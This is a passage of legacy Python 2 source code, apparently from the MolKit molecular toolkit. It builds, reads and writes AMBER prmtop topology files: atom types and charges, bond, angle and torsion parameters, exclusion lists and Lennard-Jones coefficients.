elif residue == residue.parent.residues[-1]:
residue.amber_dict = self.ctDict[amberResType]
else:
residue.amber_dict = self.allDict[amberResType]
if reorder:
self.reorderAtoms(residue, residue.amber_dict['atNameList'])
def processChain(self, residues, parmDict):
#this should be called with a list of residues representing a chain
# NOTE: self.parmDict is parm94 which was parsed by Ruth while parmDict is
# MolKit.parm94_dat.py
dict = self.prmDict
#residues = self.residues
# initialize
atNames = ''
atSym = ''
atTree = ''
resname = ''
masses = dict['Masses']
charges = dict['Charges']
uniqList = []
uniqTypes = {} # used to build list with equivalent names removed
atypTypes = {} # used to build list without equivalent names removed
allTypeList = [] # list of all types
last = len(residues)-1
dict['Nres'] = dict['Nres'] + last + 1
atres = dict['AtomRes']
ipres = dict['Ipres']
maxResLen = 0
for i in range(last+1):
res = residues[i]
atoms = res.atoms
nbat = len(atoms)
if nbat > maxResLen: maxResLen = nbat
ipres.append(ipres[-1]+nbat)
resname = resname + res.amber_type + ' '
ad = res.amber_dict
pdm = parmDict.atomTypes
for a in atoms:
# get the amber atom type
name = a.name
atres.append(i+1)
atNames = atNames+'%-4s'%name
atD = ad[name]
a.amber_type = newtype = '%-2s'%atD['type']
chg = a._charges['amber'] = atD['charge']*18.2223
charges.append(chg)
mas = a.mass = pdm[newtype][0]
masses.append(mas)
atTree = atTree+'%-4.4s'%atD['tree']
allTypeList.append(newtype)
atSym = atSym+'%-4s'%newtype
symb = newtype[0]
if symb in parmDict.AtomEquiv.keys():
if newtype in parmDict.AtomEquiv[symb]:
newsym = symb + ' '
uniqTypes[symb+' '] = 0
a.amber_symbol = symb+' '
if newsym not in uniqList:
uniqList.append(newsym)
else:
uniqTypes[newtype] = 0
a.amber_symbol = newtype
if newtype not in uniqList:
uniqList.append(newtype)
else:
uniqTypes[newtype] = 0
a.amber_symbol = newtype
if newtype not in uniqList: uniqList.append(newtype)
# to get uniq list of all types w/out equiv replacement
atypTypes[newtype] = 0
# post processing of some variable
dict['AtomNames'] = dict['AtomNames'] + atNames
dict['AtomSym'] = dict['AtomSym'] + atSym
dict['AtomTree'] = dict['AtomTree'] + atTree
dict['ResNames'] = dict['ResNames'] + resname
# save list of unique types for later use
###1/10:
#self.uniqTypeList = uniqList
uL = self.uniqTypeList
for t in uniqList:
if t not in uL:
uL.append(t)
#self.uniqTypeList = uniqTypes.keys()
self.uniqTypeList = uL
ntypes = len(uL)
dict['Ntypes'] = ntypes
aL = self.atypList
for t in atypTypes.keys():
if t not in aL:
aL.append(t)
self.atypList = aL
dict['Natyp'] = len(aL)
dict['Ntype2d'] = ntypes*ntypes
dict['Nttyp'] = ntypes * (ntypes+1)/2
if maxResLen > dict['Nmxrs']:
dict['Nmxrs'] = maxResLen
newtypelist = []
for t in residues.atoms.amber_symbol:
# Iac is 1-based
newtypelist.append( self.uniqTypeList.index(t) + 1 )
###1/10:
#dict['Iac'] = newtypelist
dict['Iac'].extend( newtypelist)
def processBonds(self, bonds, parmDict):
# NOTE: self,parmDict is parm94 parsed by Ruth while parmDict is
# MolKit.parm94_dat.py):
dict = self.prmDict
bat1 = dict['BondAt1']
bat2 = dict['BondAt2']
bnum = dict['BondNum']
batH1 = dict['BondHAt1']
batH2 = dict['BondHAt2']
bHnum = dict['BondHNum']
rk = dict['Rk']
req = dict['Req']
bndTypes = {} # used to build a unique list of bond types
btDict = parmDict.bondTypes #needed to check for wildcard * in type
for b in bonds:
a1 = b.atom1
#t1 = a1.amber_symbol
t1 = a1.amber_type
a2 = b.atom2
#t2 = a2.amber_symbol
t2 = a2.amber_type
if t1<t2:
newtype = '%-2.2s-%-2.2s'%(t1,t2)
else:
newtype = '%-2.2s-%-2.2s'%(t2,t1)
bndTypes[newtype] = 0
n1 = (a1.number-1)*3
n2 = (a2.number-1)*3
if n2<n1: tmp=n1; n1=n2; n2=tmp
if a1.element=='H' or a2.element=='H':
bHnum.append(newtype)
batH1.append(n1)
batH2.append(n2)
else:
bnum.append(newtype)
bat1.append(n1)
bat2.append(n2)
dict['Numbnd'] = len(bndTypes)
btlist = bndTypes.keys()
for bt in btlist:
rk.append( btDict[bt][0] )
req.append( btDict[bt][1] )
newbnum = []
for b in bnum:
newbnum.append( btlist.index(b) + 1 )
dict['BondNum'] = newbnum
newbnum = []
for b in bHnum:
newbnum.append( btlist.index(b) + 1 )
dict['BondHNum'] = newbnum
return
def processAngles(self, allAtoms, parmDict):
dict = self.prmDict
aa1 = dict['AngleAt1']
aa2 = dict['AngleAt2']
aa3 = dict['AngleAt3']
anum = dict['AngleNum']
aHa1 = dict['AngleHAt1']
aHa2 = dict['AngleHAt2']
aHa3 = dict['AngleHAt3']
aHnum = dict['AngleHNum']
tk = dict['Tk']
teq = dict['Teq']
angTypes = {}
atdict = parmDict.bondAngles
for a1 in allAtoms:
t1 = a1.amber_type
for b in a1.bonds:
a2 = b.atom1
if id(a2)==id(a1): a2=b.atom2
t2 = a2.amber_type
for b2 in a2.bonds:
a3 = b2.atom1
if id(a3)==id(a2): a3=b2.atom2
if id(a3)==id(a1): continue
if a1.number > a3.number: continue
t3 = a3.amber_type
nn1 = n1 = (a1.number-1)*3
nn2 = n2 = (a2.number-1)*3
nn3 = n3 = (a3.number-1)*3
if n3<n1:
nn3 = n1
nn1 = n3
rev = 0
if (t1==t3 and a1.name > a3.name) or t3 < t1:
rev = 1
if rev:
newtype = '%-2.2s-%-2.2s-%-2.2s'%(t3,t2,t1)
else:
newtype = '%-2.2s-%-2.2s-%-2.2s'%(t1, t2, t3)
#have to check for wildcard *
angTypes[newtype] = 0
if a1.element=='H' or a2.element=='H' or a3.element=='H':
aHa1.append( nn1 )
aHa2.append( nn2 )
aHa3.append( nn3 )
aHnum.append(newtype)
else:
aa1.append( nn1 )
aa2.append( nn2 )
aa3.append( nn3 )
anum.append(newtype)
atlist = angTypes.keys()
torad = pi / 180.0
atKeys = atdict.keys()
for t in atlist:
tk.append( atdict[t][0] )
teq.append( atdict[t][1]*torad )
anewlist = []
for a in anum:
anewlist.append( atlist.index( a ) + 1 )
dict['AngleNum'] = anewlist
anewlist = []
for a in aHnum:
anewlist.append( atlist.index( a ) + 1 )
dict['AngleHNum'] = anewlist
dict['Numang'] = len(atlist)
dict['Ntheth'] = len(aHa1)
dict['Mtheta'] = len(aa1)
dict['Ntheta'] = len(aa1)
return
def checkDiheType(self, t, t2, t3, t4, dict):
#zero X
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t,t2,t3,t4)
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t4,t3,t2,t)
if dict.has_key(newtype): return newtype
#X
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t2,t3,t4)
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t3,t2,t)
if dict.has_key(newtype): return newtype
#2X
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t2,t3,'X')
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t3,t2,'X')
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X','X',t3,t4)
if dict.has_key(newtype): return newtype
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X','X',t2,t)
if dict.has_key(newtype): return newtype
raise RuntimeError('dihedral type not in dictionary')
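    # Lookup order implemented above (descriptive note, not in the original):
    # the exact four-type key, its reverse, then the single-wildcard 'X -...'
    # forms, and finally the double-wildcard forms, mirroring how parm94 lists
    # generic dihedral parameters.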
## it is slower to check whether a key is in a list than to ask a
## dictionary if it has this key
##
## keys = dict.keys()
## #zero X
## newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t,t2,t3,t4)
## if newtype in keys:
## return newtype
## newtype2 = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t4,t3,t2,t)
## if newtype2 in keys:
## return newtype2
## #X
## newtypeX = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t2,t3,t4)
## if newtypeX in keys:
## return newtypeX
## newtype2X = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t3,t2,t)
## if newtype2X in keys:
## return newtype2X
## #2X
## newtypeX_X = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t2,t3,'X')
## if newtypeX_X in keys:
## return newtypeX_X
## newtype2X_X = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X',t3,t2,'X')
## if newtype2X_X in keys:
## return newtype2X_X
## newtypeXX = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X','X',t3,t4)
## if newtypeXX in keys:
## return newtypeXX
## newtype2XX = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%('X','X',t2,t)
## if newtype2XX in keys:
## return newtype2XX
## raise RuntimeError('dihedral type not in dictionary')
def processTorsions(self, allAtoms, parmDict):
# find torsions and also excluded atoms
dict = self.prmDict
foundDihedTypes = {}
ta1 = dict['DihAt1']
ta2 = dict['DihAt2']
ta3 = dict['DihAt3']
ta4 = dict['DihAt4']
tnum = dict['DihNum']
taH1 = dict['DihHAt1']
taH2 = dict['DihHAt2']
taH3 = dict['DihHAt3']
taH4 = dict['DihHAt4']
tHnum = dict['DihHNum']
nb14 = dict['N14pairs']
n14list = dict['N14pairlist']
iblo = dict['Iblo']
exclAt = dict['ExclAt']
dihedTypes = parmDict.dihedTypes
for a1 in allAtoms:
n14 = []
excl = []
t1 = a1.amber_type
restyp = a1.parent.type
if restyp in ['PRO', 'TRP', 'HID', 'HIE', 'HIP']:
ringlist = self.AA5rings[restyp]
else:
ringlist = None
for b in a1.bonds:
a2 = b.atom1
if id(a2)==id(a1): a2=b.atom2
t2 = a2.amber_type
if a2.number > a1.number: excl.append(a2.number)
for b2 in a2.bonds:
a3 = b2.atom1
if id(a3)==id(a2): a3=b2.atom2
if id(a3)==id(a1): continue
if a3.number > a1.number: excl.append(a3.number)
t3 = a3.amber_type
for b3 in a3.bonds:
a4 = b3.atom1
if id(a4)==id(a3): a4=b3.atom2
if id(a4)==id(a2): continue
if id(a4)==id(a1): continue
if a1.number > a4.number: continue
excl.append(a4.number)
t4 = a4.amber_type
newtype = '%-2.2s-%-2.2s-%-2.2s-%-2.2s'%(t1,t2,t3,t4)
dtype = self.checkDiheType(t1,t2,t3,t4,dihedTypes)
for i in range(len(dihedTypes[dtype])):
tname = dtype+'_'+str(i)
foundDihedTypes[tname] = 0
sign3 = 1
period = dihedTypes[dtype][i][3]
if period < 0.0: sign3= -1
if a4.parent==a1.parent:
if ringlist and a4.name in ringlist \
and a1.name in ringlist:
sign3= -1
if a1.element=='H' or a2.element=='H' or \
a3.element=='H' or a4.element=='H':
taH1.append( (a1.number-1)*3 )
taH2.append( (a2.number-1)*3 )
taH3.append( sign3*(a3.number-1)*3 )
taH4.append( (a4.number-1)*3 )
tHnum.append( tname )
else:
ta1.append( (a1.number-1)*3 )
ta2.append( (a2.number-1)*3 )
ta3.append( sign3*(a3.number-1)*3 )
ta4.append( (a4.number-1)*3 )
tnum.append( tname )
if sign3>0.0:
# this trick works only for 6-membered rings and
# prevents adding 1-4 interactions
# twice between atoms in the ring
# PRO, TRP and HIS and cp. have to be handled
# separately
num = a4.number-1
if num not in n14:
n14.append( num )
else: # make 3rd atom in torsion negative
ta3[-1] = -ta3[-1]
if len(excl):
# excl can contain duplicated values (pro tyr phe cycles)
# we also sort the values (probably only cosmetics)
excl.sort()
last = excl[0]
uexcl = [last]
for i in range(1,len(excl)):
if excl[i]!=last:
last = excl[i]
uexcl.append(last)
iblo.append(len(uexcl))
exclAt.extend(uexcl)
else:
iblo.append( 1 )
exclAt.append( 0 )
nb14.append(len(n14))
##!##1/28: n14.sort()
n14list.extend(n14)
# remember how many proper diehedrals
lastProper = len(tnum)
lastHProper = len(tHnum)
# loop over residues to add improper torsions
sumAts = 0
foundImproperDihedTypes = {}
for res in self.residues:
foundImproperDihedTypes = self.getImpropTors(
res, sumAts, foundImproperDihedTypes, parmDict)
sumAts = sumAts + len(res.atoms)
#typeDict = foundDihedTypes.copy()
#typeDict.update(foundImproperDihedTypes)
#print typeDict.keys()
dict['Nptra'] = len(foundDihedTypes) + len(foundImproperDihedTypes)
dict['Mphia'] = dict['Nphia'] = len(ta1)
dict['Nphih'] = len(taH1)
pn = dict['Pn']
pk = dict['Pk']
phase = dict['Phase']
dtlist = foundDihedTypes.keys()
torad = pi/180.
for t in dtlist:
index = int(t[-1])
val = dihedTypes[t[:-2]][index] # remove the '_x'
pk.append(val[1]/val[0])
phase.append(val[2]*torad)
pn.append(fabs(val[3]))
dihedTypes = parmDict.improperDihed
dtlist1 = foundImproperDihedTypes.keys()
for t in dtlist1:
val = dihedTypes[t]
pk.append(val[0])
phase.append(val[1]*torad)
pn.append(val[2])
typenum = []
dtlist = dtlist + dtlist1
for t in tnum:
typenum.append( dtlist.index(t) + 1 ) # types are 1-based
dict['DihNum'] = typenum
typenum = []
for t in tHnum:
typenum.append( dtlist.index(t) + 1 ) # types are 1-based
dict['DihHNum'] = typenum
dict['Nnb'] = len(dict['ExclAt'])
#print len(tnum), len(dict['DihNum'])
return
def getImpropTors(self, res, sumAts, foundDihedTypes, parmDict):
#eg tList:[['CA','+M','C','0'],['-M','CA','N','H']]
dict = self.prmDict
offset = sumAts * 3
nameList = res.atoms.name
typeList = res.atoms.amber_type
ta1 = dict['DihAt1']
ta2 = dict['DihAt2']
ta3 = dict['DihAt3']
ta4 = dict['DihAt4']
tnum = dict['DihNum']
taH1 = dict['DihHAt1']
taH2 = dict['DihHAt2']
taH3 = dict['DihHAt3']
taH4 = dict['DihHAt4']
tHnum = dict['DihHNum']
dihedTypes = parmDict.improperDihed
atNameList = res.amber_dict['atNameList']
resat = res.atoms
for item in res.amber_dict['impropTors']:
atomNum = []
atomType = []
newTors = []
offset = res.atoms[0].number
#use hasH to detect 'HZ2' etc
hasH = 0
for t in item:
if t[0]=='H': hasH = 1
if len(t)==2 and t[1]=='M':
if t[0]=='-':
atomType.append('C ')
atomNum.append(offset - 2)
else:
atomType.append('N ')
atomNum.append(offset + len(res.atoms) )
else:
atIndex = atNameList.index(t)
atom = resat[atIndex]
atomType.append(atom.amber_type)
atomNum.append( atom.number )
newType = self.checkDiheType(atomType[0], atomType[1],
atomType[2], atomType[3],
dihedTypes)
foundDihedTypes[newType] = 0
if hasH:
taH1.append( (atomNum[0]-1)*3 )
taH2.append( (atomNum[1]-1)*3 )
taH3.append(-(atomNum[2]-1)*3 )
taH4.append(-(atomNum[3]-1)*3 )
tHnum.append(newType)
else:
ta1.append( (atomNum[0]-1)*3 )
ta2.append( (atomNum[1]-1)*3 )
ta3.append(-(atomNum[2]-1)*3 )
ta4.append(-(atomNum[3]-1)*3 )
tnum.append(newType)
return foundDihedTypes
def getTopology(self, allAtoms, parmDict):
dict = self.prmDict
dict['ititl'] = allAtoms.top.uniq()[0].name + '.prmtop\n'
natom = dict['Natom'] = len(allAtoms)
dict['Nat3'] = natom * 3
dict['AtomNames'] = ''
dict['AtomSym'] = ''
dict['AtomTree'] = ''
dict['Ntypes'] = 0
dict['Natyp'] = 0
dict['Ntype2d'] = 0
dict['Nttyp'] = 0
dict['Masses'] = []
dict['Charges'] = []
dict['Nres'] = 0
dict['AtomRes'] = []
dict['ResNames'] = ''
dict['Ipres'] = [1]
dict['Nmxrs'] = 0
###1/10:
dict['Iac'] = []
self.uniqTypeList = []
#used for construction of Natyp
self.atypList = []
# fill get all arrays that are of len natom
# we have to call for each chain
for ch in self.chains:
self.processChain( ch.residues, parmDict)
#PAD AtomNames with 81 spaces
dict['AtomNames'] = dict['AtomNames'] + 81*' '
dict['AtomSym'] = dict['AtomSym'] + 81*' '
dict['AtomTree'] = dict['AtomTree'] + 81*' '
dict['ResNames'] = dict['ResNames'] + 81*' '
# create Iac list
#iac = []
#tl = self.uniqTypeList
#for a in allAtoms:
# iac.append( tl.index(a.amber_symbol) + 1 )
# delattr(a, 'amber_symbol')
#dict['Iac'] = iac
# to find out the number of bonds with hydrogen we simply count the
# number of hydrogen atoms
hlist = allAtoms.get(lambda x: x.element=='H')
if hlist is not None and len(hlist):
dict['Nbonh'] = numHs = len(hlist)
else:
numHs = 0
# number of bonds not involving an H atom
bonds = allAtoms.bonds[0]
dict['Mbona'] = len(bonds) - numHs
# since no bonds are constrained, Nbona==Mbona
dict['Nbona'] = dict['Mbona']
print 'after call to processChain'
# new process bond info
dict['BondAt1'] = []
dict['BondAt2'] = []
dict['BondNum'] = []
dict['BondHAt1'] = []
dict['BondHAt2'] = []
dict['BondHNum'] = []
dict['Rk'] = []
dict['Req'] = []
self.processBonds(bonds, parmDict)
print 'after call to processBonds'
# now process the angles
dict['AngleAt1'] = []
dict['AngleAt2'] = []
dict['AngleAt3'] = []
dict['AngleNum'] = []
dict['AngleHAt1'] = []
dict['AngleHAt2'] = []
dict['AngleHAt3'] = []
dict['AngleHNum'] = []
dict['Tk'] = []
dict['Teq'] = []
self.processAngles(allAtoms, parmDict)
print 'after call to processAngles'
# now handle the torsions
dict['Nhparm'] = 0
dict['Nparm'] = 0
dict['DihAt1'] = []
dict['DihAt2'] = []
dict['DihAt3'] = []
dict['DihAt4'] = []
dict['DihNum'] = []
dict['DihHAt1'] = []
dict['DihHAt2'] = []
dict['DihHAt3'] = []
dict['DihHAt4'] = []
dict['DihHNum'] = []
dict['Pn'] = []
dict['Pk'] = []
dict['Phase'] = []
dict['Nphih'] = dict['Mphia'] = dict['Nphia'] = dict['Nptra'] = 0
dict['N14pairs'] = []
dict['N14pairlist'] = []
dict['Nnb'] =0
dict['Iblo'] = []
dict['ExclAt'] = []
# FIXME
self.AA5rings ={
'PRO':['N', 'CA', 'CB', 'CG', 'CD'],
'TRP':['CG', 'CD1', 'CD2', 'NE1', 'CE2'],
'HID':['CG', 'ND1', 'CE1', 'NE2', 'CD2'],
'HIE':['CG', 'ND1', 'CE1', 'NE2', 'CD2'],
'HIP':['CG', 'ND1', 'CE1', 'NE2', 'CD2']
}
self.processTorsions(allAtoms, parmDict)
print 'after call to processTorsions'
# some unused values
dict['Nspm'] = 1
dict['Box'] = [0., 0., 0.]
dict['Boundary'] = [natom]
dict['TreeJoin'] = range(natom)
dict['Nphb'] = 0
dict['HB12'] = []
dict['HB10'] = []
llist = ['Ifpert', 'Nbper','Ngper','Ndper','Mbper', 'Mgper',
'Mdper','IfBox', 'IfCap', 'Cutcap', 'Xcap', 'Ycap',
'Zcap', 'Natcap','Ipatm', 'Nspsol','Iptres']
for item in llist:
dict[item] = 0
dict['Cno'] = self.getICO( dict['Ntypes'] )
dict['Solty'] = self.getSOLTY( dict['Natyp'] )
dict['Cn1'], dict['Cn2'] = self.getCNList(parmDict)
return
def getICO(self, ntypes):
ct = 1
icoArray = Numeric.zeros((ntypes, ntypes), 'i')
for i in range(1, ntypes+1):
for j in range(1, i+1):
icoArray[i-1,j-1]=ct
icoArray[j-1,i-1]=ct
ct = ct+1
return icoArray.ravel().tolist()
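    # Worked example (added for illustration): getICO(2) returns [1, 2, 2, 3];
    # entry (i, j) of the flattened ntypes x ntypes table is the 1-based index
    # into the packed Cn1/Cn2 lists for the nonbonded type pair (i, j).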
def getSOLTY(self, ntypes):
soltyList = []
for i in range(ntypes):
soltyList.append(0.)
return soltyList
def getCN(self, type1, type2, pow, parmDict, factor=1):
#pow is 12 or 6
#factor is 1 except when pow is 6
d = parmDict.potParam
if type1=='N3': type1='N '
if type2=='N3': type2='N '
r1, eps1 = d[type1][:2]
r2, eps2 = d[type2][:2]
eps = sqrt(eps1*eps2)
rij = r1 + r2
newval = factor*eps*rij**pow
return newval
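    # Descriptive note (mirrors the code above): with eps_ij = sqrt(eps_i*eps_j)
    # and R_ij = R_i + R_j,
    #   getCN(t1, t2, 12, parmDict)    -> eps_ij * R_ij**12    (Cn1, the A coefficient)
    #   getCN(t1, t2, 6, parmDict, 2)  -> 2 * eps_ij * R_ij**6 (Cn2, the B coefficient)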
def getCNList(self, parmDict):
ntypes = len(self.uniqTypeList)
ct = 1
## size = self.prmDict['Nttyp']
## cn1List = [0]*size
## cn2List = [0]*size
## iac = self.prmDict['Iac']
## cno = self.prmDict['Cno']
## for i in range(ntypes):
## indi = i*ntypes
## ival = self.uniqTypeList[i]
## for j in range(i, ntypes):
## jval = self.uniqTypeList[j]
## ind = cno[indi+j]-1
## cn1List[ind] = self.getCN(jval, ival, 12, parmDict)
## cn2List[ind] = self.getCN(jval, ival, 6, parmDict, 2)
nttyp = self.prmDict['Nttyp']
cn1List = []
cn2List = []
for j in range(ntypes):
jval = self.uniqTypeList[j]
for i in range(j+1):
ival = self.uniqTypeList[i]
cn1List.append(self.getCN(ival, jval, 12, parmDict))
cn2List.append(self.getCN(ival, jval, 6, parmDict, 2))
return cn1List, cn2List
def readSummary(self, allLines, dict):
#set summary numbers
ll = split(allLines[1])
assert len(ll)==12
#FIX THESE NAMES!
natom = dict['Natom'] = int(ll[0])
ntypes = dict['Ntypes'] = int(ll[1])
nbonh = dict['Nbonh'] = int(ll[2])
dict['Mbona'] = int(ll[3])
ntheth = dict['Ntheth'] = int(ll[4])
dict['Mtheta'] = int(ll[5])
nphih = dict['Nphih'] = int(ll[6])
dict['Mphia'] = int(ll[7])
dict['Nhparm'] = int(ll[8])
dict['Nparm'] = int(ll[9])
#called 'next' in some documentation
#NEXT-> Nnb
next = dict['Nnb'] = int(ll[10])
dict['Nres'] = int(ll[11])
ll = split(allLines[2])
assert len(ll)==12
nbona = dict['Nbona'] = int(ll[0])
ntheta = dict['Ntheta'] = int(ll[1])
nphia = dict['Nphia'] = int(ll[2])
numbnd = dict['Numbnd'] = int(ll[3])
numang = dict['Numang'] = int(ll[4])
numptra = dict['Nptra'] = int(ll[5])
natyp = dict['Natyp'] = int(ll[6])
dict['Nphb'] = int(ll[7])
dict['Ifpert'] = int(ll[8])
dict['Nbper'] = int(ll[9])
dict['Ngper'] = int(ll[10])
dict['Ndper'] = int(ll[11])
ll = split(allLines[3])
assert len(ll)==6
dict['Mbper'] = int(ll[0])
dict['Mgper'] = int(ll[1])
dict['Mdper'] = int(ll[2])
dict['IfBox'] = int(ll[3])
dict['Nmxrs'] = int(ll[4])
dict['IfCap'] = int(ll[5])
return dict
def readIGRAPH(self, allLines, numIGRAPH, ind=3):
#the names are not necessarily whitespace delimited
igraph = []
for i in range(numIGRAPH):
ind = ind + 1
l = allLines[ind]
for k in range(20):
it = l[k*4:k*4+4]
igraph.append(strip(it))
#igraph.extend(split(l))
return igraph, ind
def readCHRG(self, allLines, ind, numCHRG, natom):
chrg = []
ct = 0
for i in range(numCHRG):
ind = ind + 1
l = allLines[ind]
newl = []
# build 5 charges per line if enough are left
#otherwise, build the last line's worth
if natom - ct >=5:
rct = 5
else:
rct = natom - ct
for q in range(rct):
lindex = q*16
item = l[lindex:lindex+16]
newl.append(float(item))
ct = ct + 1
chrg.extend(newl)
return chrg, ind
def readNUMEX(self, allLines, ind, numIAC):
numex = []
NumexSUM = 0
for i in range(numIAC):
ind = ind + 1
ll = split(allLines[ind])
newl = []
for item in ll:
newent = int(item)
newl.append(newent)
NumexSUM = NumexSUM + newent
numex.extend(newl)
return numex, ind, NumexSUM
def readLABRES(self, allLines, ind):
done = 0
labres = []
while not done:
ind = ind + 1
ll = split(allLines[ind])
try:
int(ll[0])
done = 1
break
except ValueError:
labres.extend(ll)
#correct for 1 extra line read here
ind = ind - 1
return labres, ind
def readFList(self, allLines, ind, numITEMS):
v = []
for i in range(numITEMS):
ind = ind + 1
ll = split(allLines[ind])
newl = []
for item in ll:
newl.append(float(item))
v.extend(newl)
return v, ind
def readIList(self, allLines, ind, numITEMS):
v = []
for i in range(numITEMS):
ind = ind + 1
ll = split(allLines[ind])
newl = []
for item in ll:
newl.append(int(item))
v.extend(newl)
return v, ind
def readILList(self, allLines, ind, numITEMS, n):
bhlist = []
for i in range(n):
bhlist.append([])
ct = 0
for i in range(numITEMS):
ind = ind + 1
ll = split(allLines[ind])
for j in range(len(ll)):
item = ll[j]
newl = bhlist[ct%n]
newl.append(int(item))
ct = ct + 1
return bhlist, ind
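    # For illustration (not in the original): with n=3 the flat stream
    # i1 j1 k1 i2 j2 k2 ... read from the file is de-interleaved into three
    # parallel lists [i1, i2, ...], [j1, j2, ...], [k1, k2, ...].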
def py_read(self, filename, **kw):
#??dict['Iptres'] #dict['Nspsol'] #dict['Ipatm'] #dict['Natcap']
f = open(filename, 'r')
allLines = f.readlines()
f.close()
dict = {}
#set title
dict['ititl'] = allLines[0]
#get summary numbers
dict = self.readSummary(allLines, dict)
#set up convenience fields:
natom = dict['Natom']
ntypes = dict['Ntypes']
dict['Nat3'] = natom * 3
dict['Ntype2d'] = ntypes ** 2
nttyp = dict['Nttyp'] = ntypes * (ntypes+1)/2
# read IGRAPH->AtomNames
numIGRAPH = int(ceil((natom*1.)/20.))
anames, ind = self.readIGRAPH(allLines, numIGRAPH)
dict['AtomNames'] = join(anames)
# read CHRG->Charges
numCHRG = int(ceil((natom*1.)/5.))
dict['Charges'], ind = self.readCHRG(allLines, ind, numCHRG, natom)
# read AMASS **same number of lines as charges->Masses
dict['Masses'], ind = self.readFList(allLines, ind, numCHRG)
# read IAC **NOT same number of lines as IGRAPH 12!!
numIAC = int(ceil((natom*1.)/12.))
dict['Iac'], ind = self.readIList(allLines, ind, numIAC)
# read NUMEX **same number of lines as IAC
dict['Iblo'], ind, NumexSUM = self.readNUMEX(allLines, ind, numIAC)
# read ICO *Ntype2d/12
numICO = int(ceil((ntypes**2*1.0)/12.))
dict['Cno'], ind = self.readIList(allLines, ind, numICO)
##NB this should be half of a matrix
# read LABRES....no way to know how many
dict['ResNames'], ind = self.readLABRES(allLines, ind)
labres = dict['ResNames']
# read IPRES....depends on len of LABRES
numIPRES = int(ceil((len(labres)*1.)/20.))
dict['Ipres'], ind = self.readIList(allLines, ind, numIPRES)
# read RK + REQ-> depend on numbnd
numbnd = dict['Numbnd']
numRK = int(ceil((numbnd*1.)/5.))
dict['Rk'], ind = self.readFList(allLines, ind, numRK)
dict['Req'], ind = self.readFList(allLines, ind, numRK)
# read TK + TEQ-> depend on numang
numang = dict['Numang']
numTK = int(ceil((numang*1.)/5.))
dict['Tk'], ind = self.readFList(allLines, ind, numTK)
dict['Teq'], ind = self.readFList(allLines, ind, numTK)
# read PK, PN + PHASE-> depend on numptra
nptra = dict['Nptra']
numPK = int(ceil((nptra*1.)/5.))
dict['Pk'], ind = self.readFList(allLines, ind, numPK)
dict['Pn'], ind = self.readFList(allLines, ind, numPK)
dict['Phase'], ind = self.readFList(allLines, ind, numPK)
# read SOLTY
natyp = dict['Natyp']
numSOLTY = int(ceil((natyp*1.)/5.))
dict['Solty'], ind = self.readFList(allLines, ind, numSOLTY)
# read CN1 and CN2
numCN = int(ceil((nttyp*1.)/5.))
dict['Cn1'], ind = self.readFList(allLines, ind, numCN)
dict['Cn2'], ind = self.readFList(allLines, ind, numCN)
# read IBH, JBH, ICBH 12
nbonh = dict['Nbonh']
numIBH = int(ceil((nbonh*3.0)/12.))
[dict['BondHAt1'], dict['BondHAt2'], dict['BondHNum']], ind = \
self.readILList(allLines, ind, numIBH, 3)
# read IB, JB, ICB 12
nbona = dict['Nbona']
numIB = int(ceil((nbona*3.0)/12.))
[dict['BondAt1'], dict['BondAt2'], dict['BondNum']], ind = \
self.readILList(allLines, ind, numIB, 3)
# read ITH, JTH, KTH, ICTH 12
ntheth = dict['Ntheth']
numITH = int(ceil((ntheth*4.0)/12.))
[dict['AngleHAt1'], dict['AngleHAt2'], dict['AngleHAt3'],\
dict['AngleHNum']], ind = self.readILList(allLines, ind, numITH, 4)
# read IT, JT, KT, ICT 12
ntheta = dict['Ntheta']
numIT = int(ceil((ntheta*4.0)/12.))
[dict['AngleAt1'], dict['AngleAt2'], dict['AngleAt3'],\
dict['AngleNum']], ind = self.readILList(allLines, ind, numIT, 4)
# read IPH, JPH, KPH, LPH, ICPH 12
nphih = dict['Nphih']
numIPH = int(ceil((nphih*5.0)/12.))
[dict['DihHAt1'], dict['DihHAt2'], dict['DihHAt3'], dict['DihHAt4'],\
dict['DihHNum']], ind = self.readILList(allLines, ind, numIPH, 5)
# read IP, JP, KP, LP, ICP 12
nphia = dict['Nphia']
numIP = int(ceil((nphia*5.0)/12.))
[dict['DihAt1'], dict['DihAt2'], dict['DihAt3'], dict['DihAt4'],\
dict['DihNum']], ind = self.readILList(allLines, ind, numIP, 5)
# read NATEX 12
#FIX THIS: has to be the sum of previous entries
numATEX = int(ceil((NumexSUM*1.0)/12.))
dict['ExclAt'], ind = self.readIList(allLines, ind, numATEX)
# read CN1 and CN2
# skip ASOL
# skip BSOL
# skip HBCUT
ind = ind + 3
# read ISYMBL 20
asym, ind = self.readIGRAPH(allLines, numIGRAPH, ind)
dict['AtomSym'] = join(asym)
# read ITREE 20
atree, ind = self.readIGRAPH(allLines, numIGRAPH, ind)
dict['AtomTree'] = join(atree)
return dict
def makeList(self, llist, num):
newL = []
for i in range(len(llist[0])):
ni = []
for j in range(num):
ni.append(llist[j][i])
newL.append(ni)
return newL
#functions to write self
def write(self, filename, **kw):
fptr = open(filename, 'w')
dict = self.prmDict
self.writeItitl(fptr, dict['ititl'])
self.writeSummary(fptr)
#WHAT ABOUT SOLTY???
self.writeString(fptr,dict['AtomNames'][:-81])
for k in ['Charges', 'Masses', 'Iac','Iblo','Cno']:
item = dict[k]
f = self.formatD[k]
if f[2]:
self.writeTupleList(fptr, item, f[0], f[1], f[2])
else:
self.writeList(fptr, item, f[0], f[1])
self.writeString(fptr,dict['ResNames'][:-81])
